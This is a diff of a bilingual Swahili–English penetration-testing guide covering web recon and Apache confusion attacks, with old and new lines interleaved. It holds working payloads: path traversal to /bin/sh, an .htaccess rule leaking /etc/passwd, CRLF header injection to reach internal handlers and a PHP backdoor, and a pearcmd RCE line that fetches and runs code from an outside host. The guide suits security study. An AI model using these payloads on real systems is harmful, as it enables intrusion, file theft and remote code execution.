- If you are playing **CTF**, ujanja "wa kawaida" ni ku**ficha** **taarifa** ndani ya comments upande wa **kulia** wa **ukurasa** (kwa kutumia **mamia** ya **spaces** hivyo huwezi kuona data ikiwa utafungua source code kwa browser). Mwingine uwezekano ni kutumia **several new lines** na **kuhifadhi taarifa** kwenye comment mwishoni mwa ukurasa wa wavuti.
- **API keys**: Ikiwa **unapata API key** kuna mwongozo unaoelezea jinsi ya kutumia API keys za platforms mbalimbali: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](<https://github.com/l4yton/RegHex)/>)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
- Google API keys: Ikiwa unapata API key inayofanana na **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik unaweza kutumia project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) kuona ni APIs gani key inaweza kupata.
- **S3 Buckets**: Wakati wa spidering angalia kama subdomain yoyote au link yoyote ina uhusiano na S3 bucket. Katika hili, [**angalia** the **permissions** of the bucket](buckets/index.html).
- **Comments:** Check the comments of all the files, you can find **credentials** or **hidden functionality**.
- If you are playing **CTF**, a "common" trick is to **hide** **information** inside comments at the **right** of the **page** (using **hundreds** of **spaces** so you don't see the data if you open the source code with the browser). Other possibility is to use **several new lines** and **hide information** in a comment at the **bottom** of the web page.
- **API keys**: If you **find any API key** there is guide that indicates how to use API keys of different platforms: [**keyhacks**](https://github.com/streaak/keyhacks)**,** [**zile**](https://github.com/xyele/zile.git)**,** [**truffleHog**](https://github.com/trufflesecurity/truffleHog)**,** [**SecretFinder**](https://github.com/m4ll0k/SecretFinder)**,** [**RegHex**](<https://github.com/l4yton/RegHex)/>)**,** [**DumpsterDive**](https://github.com/securing/DumpsterDiver)**,** [**EarlyBird**](https://github.com/americanexpress/earlybird)
- Google API keys: If you find any API key looking like **AIza**SyA-qLheq6xjDiEIRisP_ujUseYLQCHUjik you can use the project [**gmapapiscanner**](https://github.com/ozguralp/gmapsapiscanner) to check which apis the key can access.
- **S3 Buckets**: While spidering look if any **subdomain** or any **link** is related with some **S3 bucket**. In that case, [**check** the **permissions** of the bucket](buckets/index.html).
### Special findings
**Wakati wa** kufanya **spidering** na **brute-forcing** unaweza kupata vitu **vichangamsha** ambavyo unapaswa **kutambua**.
**While** performing the **spidering** and **brute-forcing** you could find **interesting** **things** that you have to **notice**.
**Interesting files**
- Tafuta **links** za faili nyingine ndani ya **CSS** files.
- Look for **links** to other files inside the **CSS** files.
- [If you find a _**.git**_ file some information can be extracted](git.md)
- Ikiwa unapata _**.env**_ unaweza kupata taarifa kama api keys, dbs passwords na taarifa nyingine.
- Ikiwa unapata **API endpoints** unapaswa [pia kuzijaribu](web-api-pentesting.md). Hizi si faili, lakini kwa kawaida "zinaweza kuonekana" kama faili.
- **JS files**: Katika sehemu ya spidering zimetajwa tools kadhaa ambazo zinaweza kutoa paths kutoka kwa JS files. Pia, itakuwa muhimu **kuangalia kila JS file uliyoipata**, kwani wakati mwingine, mabadiliko yanaweza kuashiria kwamba ranakuwepo vulnerability mpya kwenye code. Unaweza kutumia mfano [**JSMon**](https://github.com/robre/jsmon)**.**
- Unapaswa pia kukagua JS files zilizogunduliwa kwa kutumia [**RetireJS**](https://github.com/retirejs/retire.js/) au [**JSHole**](https://github.com/callforpapers-source/jshole) kuona kama zina vulnerabilities.
- If you find a _**.env**_ information such as api keys, dbs passwords and other information can be found.
- If you find **API endpoints** you [should also test them](web-api-pentesting.md). These aren't files, but will probably "look like" them.
- **JS files**: In the spidering section several tools that can extract path from JS files were mentioned. Also, It would be interesting to **monitor each JS file found**, as in some ocations, a change may indicate that a potential vulnerability was introduced in the code. You could use for example [**JSMon**](https://github.com/robre/jsmon)**.**
- You should also check discovered JS files with [**RetireJS**](https://github.com/retirejs/retire.js/) or [**JSHole**](https://github.com/callforpapers-source/jshole) to find if it's vulnerable.
- **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
- **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
- **JsFuck deobfuscation** (javascript with chars:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
- [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
- Katika matukio mengi, utahitaji **kuelewa regular expressions** zinazotumika. Hii itakuwa ya msaada: [https://regex101.com/](https://regex101.com) au [https://pythonium.net/regex](https://pythonium.net/regex)
- Pia unaweza **kuangalia files ambazo ziligunduliwa kuwa zina forms**, kwani mabadiliko kwenye parameter au kuonekana kwa form mpya kunaweza kuashiria functionality mpya yenye hatari.
- On several occasions, you will need to **understand the regular expressions** used. This will be useful: [https://regex101.com/](https://regex101.com) or [https://pythonium.net/regex](https://pythonium.net/regex)
- You could also **monitor the files were forms were detected**, as a change in the parameter or the apearance f a new form may indicate a potential new vulnerable functionality.
**403 Forbidden/Basic Authentication/401 Unauthorized (bypass)**
@ -313,21 +312,21 @@ _Kumbuka kwamba kila wakati direktorisi mpya inapogunduliwa wakati wa brute-forc
**502 Proxy Error**
Kama ukurasa wowote **unareact** kwa hiyo **code**, inawezekana kuwa ni **proxy iliyo misconfigured mbaya**. **Kama utatuma request ya HTTP kama: `GET https://google.com HTTP/1.1`** (ikiwa na host header na headers nyingine za kawaida), **proxy** itajaribu **kupata** _**google.com**_ **na utakuwa umepata** SSRF.
If any page **responds** with that **code**, it's probably a **bad configured proxy**. **If you send a HTTP request like: `GET https://google.com HTTP/1.1`** (with the host header and other common headers), the **proxy** will try to **access** _**google.com**_ **and you will have found a** SSRF.
**NTLM Authentication - Info disclosure**
Ikiwa server inayouliza authentication ni **Windows** au unapata login inayounga mkono **credentials** zako (na kuuliza **domain** **name**), unaweza kusababisha **info disclosure**.\
**Tuma** **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` na kutokana na jinsi **NTLM authentication inavyofanya kazi**, server itajibu kwa info za ndani (toleo la IIS, toleo la Windows...) ndani ya header "WWW-Authenticate".\
Unaweza **kuendesha hii kwa automation** kwa kutumia **nmap plugin** "_http-ntlm-info.nse_".
If the running server asking for authentication is **Windows** or you find a login asking for your **credentials** (and asking for **domain** **name**), you can provoke an **information disclosure**.\
**Send** the **header**: `“Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=”` and due to how the **NTLM authentication works**, the server will respond with internal info (IIS version, Windows version...) inside the header "WWW-Authenticate".\
You can **automate** this using the **nmap plugin** "_http-ntlm-info.nse_".
**HTTP Redirect (CTF)**
Inawezekana **kuweka content** ndani ya **Redirection**. Content hii **haitaonyeshwa kwa mtumiaji** (kwa sababu browser itafanya redirect) lakini kuna kitu kinaweza kuwa **kimefichwa** ndani yake.
It is possible to **put content** inside a **Redirection**. This content **won't be shown to the user** (as the browser will execute the redirection) but something could be **hidden** in there.
### Web Vulnerabilities Checking
Sasa baada ya kufanya enumeration kamili ya web application ni wakati wa kuangalia aina nyingi za possible vulnerabilities. Unaweza kupata checklist hapa:
Now that a comprehensive enumeration of the web application has been performed it's time to check for a lot of possible vulnerabilities. You can find the checklist here:
{{#ref}}
@ -342,7 +341,7 @@ Find more info about web vulns in:
### Monitor Pages for changes
Unaweza kutumia tools kama [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) kufuatilia kurasa kwa mabadiliko ambayo yanaweza kuingiza vulnerabilities.
You can use tools such as [https://github.com/dgtlmoon/changedetection.io](https://github.com/dgtlmoon/changedetection.io) to monitor pages for modifications that might insert vulnerabilities.
### HackTricks Automatic Commands
```

118
src/network-services-pentesting/pentesting-web/apache.md
View File

@ -2,13 +2,13 @@
{{#include ../../banners/hacktricks-training.md}}
## Viendelezo vya PHP vinavyoweza kutekelezwa
## Extensions za PHP zinazotekelezwa
Angalia ni viendelezo gani vinavyotekelezwa na seva ya Apache. Ili kutafuta, unaweza kutekeleza:
Angalia ni PHP extensions zipi zinazoendeshwa na server ya Apache. Kutafuta hizo unaweza kuendesha:
```bash
grep -R -B1 "httpd-php" /etc/apache2
```
Pia, baadhi ya maeneo ambapo unaweza kupata usanidi huu ni:
Pia, baadhi ya maeneo ambako unaweza kupata usanidi huu ni:
```bash
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
@ -21,14 +21,14 @@ curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Con
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
```
## LFI kwa kutumia .htaccess ErrorDocument file provider (ap_expr)
## LFI kupitia .htaccess ErrorDocument mtoa faili (ap_expr)
Iwapo unaweza kudhibiti .htaccess ya saraka na AllowOverride inajumuisha FileInfo kwa njia hiyo, unaweza kubadilisha majibu ya 404 kuwa kusoma mafaili ya ndani kwa hiari kwa kutumia function file() ya ap_expr ndani ya ErrorDocument.
Ikiwa unaweza kudhibiti .htaccess ya saraka na AllowOverride inajumuisha FileInfo kwa njia hiyo, unaweza kubadilisha majibu ya 404 kuwa kusoma faili za ndani kwa kadri unavyotaka kwa kutumia ap_expr file() function ndani ya ErrorDocument.
- Mahitaji:
- Apache 2.4 na expression parser (ap_expr) imewezeshwa (chaguo-msingi katika 2.4).
- vhost/dir inapaswa kuruhusu .htaccess kuweka ErrorDocument (AllowOverride FileInfo).
- mtumiaji wa worker wa Apache lazima awe na ruhusa za kusoma kwenye faili lengwa.
- The vhost/dir must allow .htaccess to set ErrorDocument (AllowOverride FileInfo).
- Mtumiaji wa worker wa Apache lazima awe na ruhusa za kusoma kwenye faili lengwa.
.htaccess payload:
```apache
@ -37,31 +37,31 @@ Header always set X-Debug-Tenant "demo"
# On any 404 under this directory, return the contents of an absolute filesystem path
ErrorDocument 404 %{file:/etc/passwd}
```
Chochea kwa kuomba njia yoyote isiyokuwepo chini ya saraka hiyo, kwa mfano unapotumia vibaya userdir-style hosting:
Sababisha kwa kuomba njia yoyote isiyokuwepo chini ya saraka hiyo, kwa mfano ukitumia vibaya userdir-style hosting:
```bash
curl -s http://target/~user/does-not-exist | sed -n '1,20p'
```
Vidokezo na ushauri:
- Njia kamili pekee ndizo zinazofanya kazi. Yaliyomo yatarudishwa kama mwili wa jibu kwa handler ya 404.
- Idhini za kusoma zinazofanya kazi ni zile za mtumiaji wa Apache (kwa kawaida www-data/apache). Hutaweza kusoma /root/* au /etc/shadow katika usanidi wa chaguomsingi.
- Hata kama .htaccess ni milki ya root, ikiwa saraka ya mzazi inamilikiwa na tenant na inaruhusu rename, unaweza kufanikiwa kubadilisha jina la .htaccess ya awali na kupakia toleo lako kupitia SFTP/FTP:
- Njia kamili pekee ndizo zinafanya kazi. Yaliyomo yanarudishwa kama mwili wa jibu kwa 404 handler.
- Ruhusa za kusoma zinazotumika ni za mtumiaji wa Apache (kwa kawaida www-data/apache). Hautasoma /root/* au /etc/shadow katika mipangilio ya default.
- Hata kama .htaccess inamilikiwa na root, ikiwa saraka mzazi inamilikiwa na tenant na inaruhusu rename, huenda ukaweza kurejina .htaccess asilia na kupakia toleo lako mbadala kupitia SFTP/FTP:
- rename .htaccess .htaccess.bk
- put your malicious .htaccess
- Tumia hili kusoma chanzo cha application chini ya DocumentRoot au vhost config paths ili kuvuna siri (DB creds, API keys, etc.).
- Tumia hili kusoma application source chini ya DocumentRoot au vhost config paths ili kuvuna siri (DB creds, API keys, etc.).
## Confusion Attack <a href="#a-whole-new-attack-confusion-attack" id="a-whole-new-attack-confusion-attack"></a>
Aina hizi za mashambulizi zilitangazwa na kurekodiwa [**by Orange in this blog post**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) na yafuatayo ni muhtasari. Shambulizi la "confusion" kwa msingi linatumia jinsi modules nyingi zinazofanya kazi pamoja kuunda Apache hazifanyi kazi kwa usawazishwaji kamili; kufanya baadhi yao kubadilisha data isiyotegemewa kunaweza kusababisha udhaifu katika module inayofuata.
Aina hizi za mashambulizi zimetangazwa na kuandikwa [**by Orange in this blog post**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1) na yafuatayo ni muhtasari. Shambulizi la "confusion" kimsingi linatumia jinsi moduli nyingi zinazofanya kazi pamoja kuunda Apache hazifanyi kazi kwa usawazishaji kamili; kufanya baadhi yao kubadili data isiyotegemewa kunaweza kusababisha udhaifu katika moduli inayofuata.
### Filename Confusion
#### Truncation
The **`mod_rewrite`** will trim the content of `r->filename` after the character `?` ([_**modules/mappers/mod_rewrite.c#L4141**_](https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L4141)). This isn't totally wrong as most modules will treat `r->filename` as an URL. Lakini wakati mwingine itachukuliwa kama file path, jambo ambalo litasababisha tatizo.
The **`mod_rewrite`** will trim the content of `r->filename` after the character `?` ([_**modules/mappers/mod_rewrite.c#L4141**_](https://github.com/apache/httpd/blob/2.4.58/modules/mappers/mod_rewrite.c#L4141)). This isn't totally wrong as most modules will treat `r->filename` as an URL. Lakini katika matukio mengine hii itachukuliwa kama file path, ambayo inaweza kusababisha tatizo.
- **Path Truncation**
Niwezekana kutumiwa `mod_rewrite` kama katika mfano wa sheria ufuatao kufikia faili nyingine ndani ya mfumo wa faili, kwa kuondoa sehemu ya mwisho ya njia iliyotarajiwa kwa kuongeza tu `?`:
Inawezekana kutumia vibaya `mod_rewrite` kama katika mfano wa rule ufuatao kufikia faili nyingine ndani ya file system, kwa kuondoa sehemu ya mwisho ya path inayotarajiwa kwa kuongeza tu `?`:
```bash
RewriteEngine On
RewriteRule "^/user/(.+)$" "/var/user/$1/profile.yml"
@ -74,9 +74,9 @@ curl http://server/user/orange
curl http://server/user/orange%2Fsecret.yml%3F
# the output of file `/var/user/orange/secret.yml`
```
- **Uteuzi wa RewriteFlag wa Kuwadanganya**
- **Mislead RewriteFlag Assignment**
Katika rewrite rule ifuatayo, mradi URL itakapomalizika kwa .php itatibiwa na kutekelezwa kama php. Kwa hivyo, inawezekana kutuma URL inayomalizika kwa .php baada ya `?` huku ikipakia kwenye path aina tofauti ya faili (kama picha) yenye msimbo wa php wenye madhara ndani yake:
Katika rewrite rule ifuatayo, mradi tu URL inaishie na .php itachukuliwa na kutekelezwa kama php. Kwa hivyo, inawezekana kutuma URL inayomalizika na .php baada ya `?` wakati ukipakia kwenye path faili ya aina tofauti (kama picha) yenye php code yenye madhara ndani yake:
```bash
RewriteEngine On
RewriteRule ^(.+\.php)$ $1 [H=application/x-httpd-php]
@ -91,7 +91,7 @@ curl http://server/upload/1.gif%3fooo.php
```
#### **ACL Bypass**
Inawezekana kupata faili ambazo mtumiaji haipaswi kupata, hata kama ufikiaji unapaswa kukataliwa kwa usanidi kama:
Inawezekana kufikia faili ambazo mtumiaji hapaswi kuweza kuzipata hata kama ufikiaji unapaswa kukataliwa kwa usanidi kama:
```xml
<Files "admin.php">
AuthType Basic
@ -100,20 +100,20 @@ AuthUserFile "/etc/apache2/.htpasswd"
Require valid-user
</Files>
```
Kwa sababu kwa chaguo-msingi PHP-FPM itapokea URLs zinazomalizika na `.php`, kama `http://server/admin.php%3Fooo.php`, na kwa sababu PHP-FPM itaondoa chochote baada ya alama `?`, URL hapo juu itaruhusu kupakia `/admin.php` hata kama sheria iliyotangulia ilizuia.
Kwa sababu kwa chaguo-msingi PHP-FPM itapokea URLs zinazomalizika kwa `.php`, kama `http://server/admin.php%3Fooo.php` na kwa sababu PHP-FPM itaondoa chochote baada ya tabia `?`, URL ya hapo juu itaruhusu kupakia `/admin.php` hata kama sheria iliyotangulia ilizizuia.
### DocumentRoot Kuchanganyikiwa
### Mkanganyiko wa DocumentRoot
```bash
DocumentRoot /var/www/html
RewriteRule ^/html/(.*)$ /$1.html
```
Jambo la kufurahisha kuhusu Apache ni kwamba rewrite iliyopita itajaribu kufikia faili kutoka kwa documentRoot na kutoka root. Kwa hivyo, ombi la `https://server/abouth.html` litatafuta faili katika `/var/www/html/about.html` na `/about.html` kwenye mfumo wa faili. Hii kwa msingi inaweza kutumika vibaya kufikia faili ndani ya mfumo wa faili.
Jambo la kufurahisha kuhusu Apache ni kwamba rewrite iliyotangulia itajaribu kufikia faili kutoka kwa documentRoot na pia kutoka kwa root. Kwa hivyo, ombi la `https://server/abouth.html` litatafuta faili katika `/var/www/html/about.html` na `/about.html` kwenye mfumo wa faili. Hii inaweza kutumiwa vibaya ili kufikia faili ndani ya mfumo wa faili.
#### **Ufunuo wa Chanzo upande wa Server**
#### **Ufichaji wa Source Code upande wa seva**
- **Ufunuo wa Chanzo la CGI**
- **Fichua CGI Source Code**
Kuweka tu %3F mwishoni inatosha leak msimbo wa module ya cgi:
Kuweka tu %3F mwishoni inatosha ili leak source code ya cgi module:
```bash
curl http://server/cgi-bin/download.cgi
# the processed result from download.cgi
@ -123,9 +123,9 @@ curl http://server/html/usr/lib/cgi-bin/download.cgi%3F
# ...
# # the source code of download.cgi
```
- **Kufichua Chanzo la PHP**
- **Disclose PHP Source Code**
Ikiwa server ina domain tofauti na moja kati yao ni domain ya static, hii inaweza kutumika vibaya kutembea kwenye mfumo wa faili na leak php code:
Ikiwa server ina domains tofauti, ambapo moja yao ni static domain, hii inaweza kutumiwa vibaya kusafiri kwenye file system na leak php code:
```bash
# Leak the config.php file of the www.local domain from the static.local domain
curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
@ -133,7 +133,7 @@ curl http://www.local/var/www.local/config.php%3F -H "Host: static.local"
```
#### **Local Gadgets Manipulation**
Tatizo kuu na shambulio lililopita ni kwamba kwa chaguo-msingi, sehemu kubwa ya ufikiaji wa filesystem itakataliwa, kama ilivyo kwenye Apache HTTP Servers [configuration template](https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115):
Tatizo kuu la shambulio lililotangulia ni kwamba, kwa chaguo-msingi, ufikiaji mwingi wa mfumo wa faili utakataliwa, kama inavyoonekana kwenye Apache HTTP Servers [configuration template](https://github.com/apache/httpd/blob/trunk/docs/conf/httpd.conf.in#L115):
```xml
<Directory />
AllowOverride None
@ -147,38 +147,38 @@ AllowOverride None
Require all granted
</Directory>
```
Therefore, it would be possible to **abuse files located inside `/usr/share` in these distributions.**
Kwa hiyo, ingewezekana **kutumia vibaya faili zilizoko ndani ya `/usr/share` katika distributions hizi.**
**Gadget ya Ndani kwa Information Disclosure**
**Local Gadget to Information Disclosure**
- **Apache HTTP Server** with **websocketd** may expose the **dump-env.php** script at **/usr/share/doc/websocketd/examples/php/**, which can leak sensitive environment variables.
- Servers with **Nginx** or **Jetty** might expose sensitive web application information (e.g., **web.xml**) through their default web roots placed under **/usr/share**:
- **Apache HTTP Server** pamoja na **websocketd** inaweza kufichua script ya **dump-env.php** katika **/usr/share/doc/websocketd/examples/php/**, ambayo inaweza leak variable za mazingira zenye nyeti.
- Server zilizo na **Nginx** au **Jetty** zinaweza kufichua taarifa nyeti za web application (mfano, **web.xml**) kupitia default web roots zilizowekwa chini ya **/usr/share**:
- **/usr/share/nginx/html/**
- **/usr/share/jetty9/etc/**
- **/usr/share/jetty9/webapps/**
**Gadget ya Ndani kwa XSS**
**Local Gadget to XSS**
- On Ubuntu Desktop with **LibreOffice installed**, exploiting the help files' language switch feature can lead to **Cross-Site Scripting (XSS)**. Manipulating the URL at **/usr/share/libreoffice/help/help.html** can redirect to malicious pages or older versions through **unsafe RewriteRule**.
- Kwenye Ubuntu Desktop ikiwa **LibreOffice** imewekwa, kuchukua faida ya kipengele cha kubadilisha lugha kwenye faili za msaada kunaweza kusababisha **Cross-Site Scripting (XSS)**. Kurekebisha URL katika **/usr/share/libreoffice/help/help.html** kunaweza kuelekeza kwa kurasa hatarishi au toleo la zamani kupitia **unsafe RewriteRule**.
**Gadget ya Ndani kwa LFI**
**Local Gadget to LFI**
- If PHP or certain front-end packages like **JpGraph** or **jQuery-jFeed** are installed, their files can be exploited to read sensitive files like **/etc/passwd**:
- Ikiwa PHP au baadhi ya front-end packages kama **JpGraph** au **jQuery-jFeed** zimesh نصب, faili zao zinaweza kutumika kusoma faili nyeti kama **/etc/passwd**:
- **/usr/share/doc/libphp-jpgraph-examples/examples/show-source.php**
- **/usr/share/javascript/jquery-jfeed/proxy.php**
- **/usr/share/moodle/mod/assignment/type/wims/getcsv.php**
**Gadget ya Ndani kwa SSRF**
**Local Gadget to SSRF**
- Utilizing **MagpieRSS's magpie_debug.php** at **/usr/share/php/magpierss/scripts/magpie_debug.php**, an SSRF vulnerability can be easily created, providing a gateway to further exploits.
- Kutumia **MagpieRSS**'s **magpie_debug.php** katika **/usr/share/php/magpierss/scripts/magpie_debug.php**, kunaweza kuundwa kwa urahisi udhaifu wa **SSRF**, ukitoa mwendo wa kuingia kwa exploits zaidi.
**Gadget ya Ndani kwa RCE**
**Local Gadget to RCE**
- Opportunities for **Remote Code Execution (RCE)** are vast, with vulnerable installations like an outdated **PHPUnit** or **phpLiteAdmin**. These can be exploited to execute arbitrary code, showcasing the extensive potential of local gadgets manipulation.
- Fursa za **Remote Code Execution (RCE)** ni nyingi, na ufungaji ulio hatarini kama **PHPUnit** iliyotoka zamani au **phpLiteAdmin**. Hizi zinaweza kutumiwa kutekeleza code yoyote, zikionyesha uwezo mkubwa wa uendeshaji wa local gadgets.
#### **Jailbreak from Local Gadgets**
It's also possible to jailbreak from the allowed folders by following symlinks generated by installed software in those folders, like:
Inawezekana pia kufanya jailbreak kutoka kwa folda zilizopewa ruhusa kwa kufuata symlinks zilizotengenezwa na software iliyowekwa katika hizo folda, kama:
- **Cacti Log**: `/usr/share/cacti/site/` -> `/var/log/cacti/`
- **Solr Data**: `/usr/share/solr/data/` -> `/var/lib/solr/data`
@ -186,18 +186,18 @@ It's also possible to jailbreak from the allowed folders by following symlinks g
- **MediaWiki Config**: `/usr/share/mediawiki/config/` -> `/var/lib/mediawiki/config/`
- **SimpleSAMLphp Config**: `/usr/share/simplesamlphp/config/` -> `/etc/simplesamlphp/`
Moreover, abusing symlinks it was possible to obtain **RCE in Redmine.**
Zaidi ya hayo, kwa kutumia vibaya symlinks ilikuwa inawezekana kupata **RCE katika Redmine.**
### Mkanganyiko wa Handler <a href="#id-3-handler-confusion" id="id-3-handler-confusion"></a>
### Handler Confusion <a href="#id-3-handler-confusion" id="id-3-handler-confusion"></a>
This attack exploits the overlap in functionality between the `AddHandler` and `AddType` directives, which both can be used to **enable PHP processing**. Originally, these directives affected different fields (`r->handler` and `r->content_type` respectively) in the server's internal structure. However, due to legacy code, Apache handles these directives interchangeably under certain conditions, converting `r->content_type` into `r->handler` if the former is set and the latter is not.
Shambulio hili linatumia mchanganyiko wa utendaji kati ya directives `AddHandler` na `AddType`, ambazo zote zinaweza kutumika kuweza **uchakataji wa PHP**. Mwanzo, directives hizi ziliathiri mashamba tofauti (`r->handler` na `r->content_type` mtawalia) katika muundo wa ndani wa server. Hata hivyo, kutokana na legacy code, Apache inashughulikia directives hizi mabadiliko chini ya masharti fulani, ikibadilisha `r->content_type` kuwa `r->handler` ikiwa ya kwanza imewekwa na ya pili haijaundwa.
Moreover, in the Apache HTTP Server (`server/config.c#L420`), if `r->handler` is empty before executing `ap_run_handler()`, the server **uses `r->content_type` as the handler**, effectively making `AddType` and `AddHandler` identical in effect.
Zaidi ya hayo, katika Apache HTTP Server (`server/config.c#L420`), ikiwa `r->handler` iko tupu kabla ya kutekeleza `ap_run_handler()`, server inatumia `r->content_type` kama handler, kufanya `AddType` na `AddHandler` kuwa sawa kwa matokeo.
#### **Overwrite Handler to Disclose PHP Source Code**
In [**this talk**](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf), was presented a vulnerability where an incorrect `Content-Length` sent by a client can cause Apache to mistakenly **return the PHP source code**. This was because an error handling issue with ModSecurity and the Apache Portable Runtime (APR), where a double response leads to overwriting `r->content_type` to `text/html`.\
Because ModSecurity doesn't properly handle return values, it would return the PHP code and won't interpret it.
In [**this talk**](https://web.archive.org/web/20210909012535/https://zeronights.ru/wp-content/uploads/2021/09/013_dmitriev-maksim.pdf) iliwasilishwa udhaifu ambapo `Content-Length` isiyo sahihi iliyotumwa na client inaweza kusababisha Apache kwa bahati mbaya **kurudisha chanzo cha PHP**. Hii ilikuwa kutokana na tatizo la kushughulikia makosa na **ModSecurity** na **Apache Portable Runtime (APR)**, ambapo response mara mbili husababisha kuandika juu `r->content_type` kuwa `text/html`.\
Kwa sababu ModSecurity haishughuliki vizuri na return values, ingerejesha code ya PHP badala ya kuielewa.
#### **Overwrite Handler to XXXX**
@ -205,36 +205,36 @@ TODO: Orange hasn't disclose this vulnerability yet
### **Invoke Arbitrary Handlers**
If an attacker is able to control the **`Content-Type`** header in a server response he is going to be able to **invoke arbitrary module handlers**. However, by the point the attacker controls this, most of the process of the request will be done. However, it's possible to **restart the request process abusing the `Location` header** because if the **r**eturned `Status` is 200 and the `Location` header starts with a `/`, the response is treated as a Server-Side Redirection and should be processed
Ikiwa mshambuliaji anaweza kudhibiti header ya `Content-Type` katika response ya server atakuwa na uwezo wa kuiita module handlers yoyote. Hata hivyo, kwa wakati mshambuliaji atakapodhibiti hili, sehemu kubwa ya mchakato wa ombi itakuwa imekamilika. Hata hivyo, inawezekana **kuanzisha tena mchakato wa ombi kwa kutumia `Location` header`** kwa sababu ikiwa `Status` iliyorejeshwa ni 200 na header ya `Location` inaanza na `/`, response inashughulikiwa kama Server-Side Redirection na inapaswa kuchakatwa
According to [RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875) (specification about CGI) in [Section 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) defines a Local Redirect Response behavior:
Kulingana na [RFC 3875](https://datatracker.ietf.org/doc/html/rfc3875) (maelezo kuhusu CGI) katika [Section 6.2.2](https://datatracker.ietf.org/doc/html/rfc3875#section-6.2.2) inabainisha tabia ya Local Redirect Response:
> The CGI script can return a URI path and query-string (local-pathquery) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.
Therefore, to perform this attack is needed one of the following vulns:
Kwa hiyo, kutekeleza shambulio hili kunahitaji mojawapo ya udhaifu zifuatazo:
- CRLF Injection in the CGI response headers
- SSRF with complete control of the response headers
#### **Handler yoyote kwa Information Disclosure**
#### **Arbitrary Handler to Information Disclosure**
For example `/server-status` should only be accessible locally:
Kwa mfano `/server-status` inapaswa kupatikana tu kwa eneo la ndani:
```xml
<Location /server-status>
SetHandler server-status
Require local
</Location>
```
Inawezekana kuifikia kwa kuweka `Content-Type` kuwa `server-status` na header ya Location kuanza na `/`
Inawezekana kuipata kwa kuweka `Content-Type` kuwa `server-status` na header ya Location kuanza na `/`
```
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a
```
#### **Arbitrary Handler hadi SSRF Kamili**
#### **Handler Yoyote hadi SSRF Kamili**
Kuelekeza kwa `mod_proxy` ili kufikia protokoli yoyote kwenye URL yoyote:
Kuelekeza kwa `mod_proxy` ili kufikia itifaki yoyote kwenye URL yoyote:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
@ -243,11 +243,11 @@ http://example.com/%3F
%0d%0a
%0d%0a
```
Hata hivyo, header ya `X-Forwarded-For` inaongezwa, ikizuia upatikanaji wa cloud metadata endpoints.
Hata hivyo, kichwa cha `X-Forwarded-For` kimeongezwa, kinachozuia ufikiaji wa cloud metadata endpoints.
#### **Mshughulikiaji lolote ili Kufikia Unix Domain Socket ya ndani**
#### **Arbitrary Handler to Access Local Unix Domain Socket**
Fikia Unix Domain Socket ya ndani ya PHP-FPM ili kutekeleza PHP backdoor iliyoko katika `/tmp/`:
Fikia local Unix Domain Socket ya PHP-FPM ili kutekeleza PHP backdoor iliyoko katika `/tmp/`:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo %0d%0a
@ -256,7 +256,7 @@ Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0
```
#### **Arbitrary Handler to RCE**
Image rasmi ya [PHP Docker](https://hub.docker.com/_/php) inajumuisha PEAR (`Pearcmd.php`), zana ya usimamizi wa pakiti za PHP kwa mstari wa amri, ambayo inaweza kutumiwa vibaya kupata RCE:
Image rasmi ya [PHP Docker](https://hub.docker.com/_/php) ina PEAR (`Pearcmd.php`), zana ya usimamizi wa vifurushi vya PHP kwa mstari wa amri, ambayo inaweza kutumika vibaya kupata RCE:
```
http://server/cgi-bin/redir.cgi?r=http://%0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}
@ -265,7 +265,7 @@ orange.tw/x|perl
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a
```
Angalia [**Docker PHP LFI Summary**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), imeandikwa na [Phith0n](https://x.com/phithon_xg) kwa maelezo ya kina ya mbinu hii.
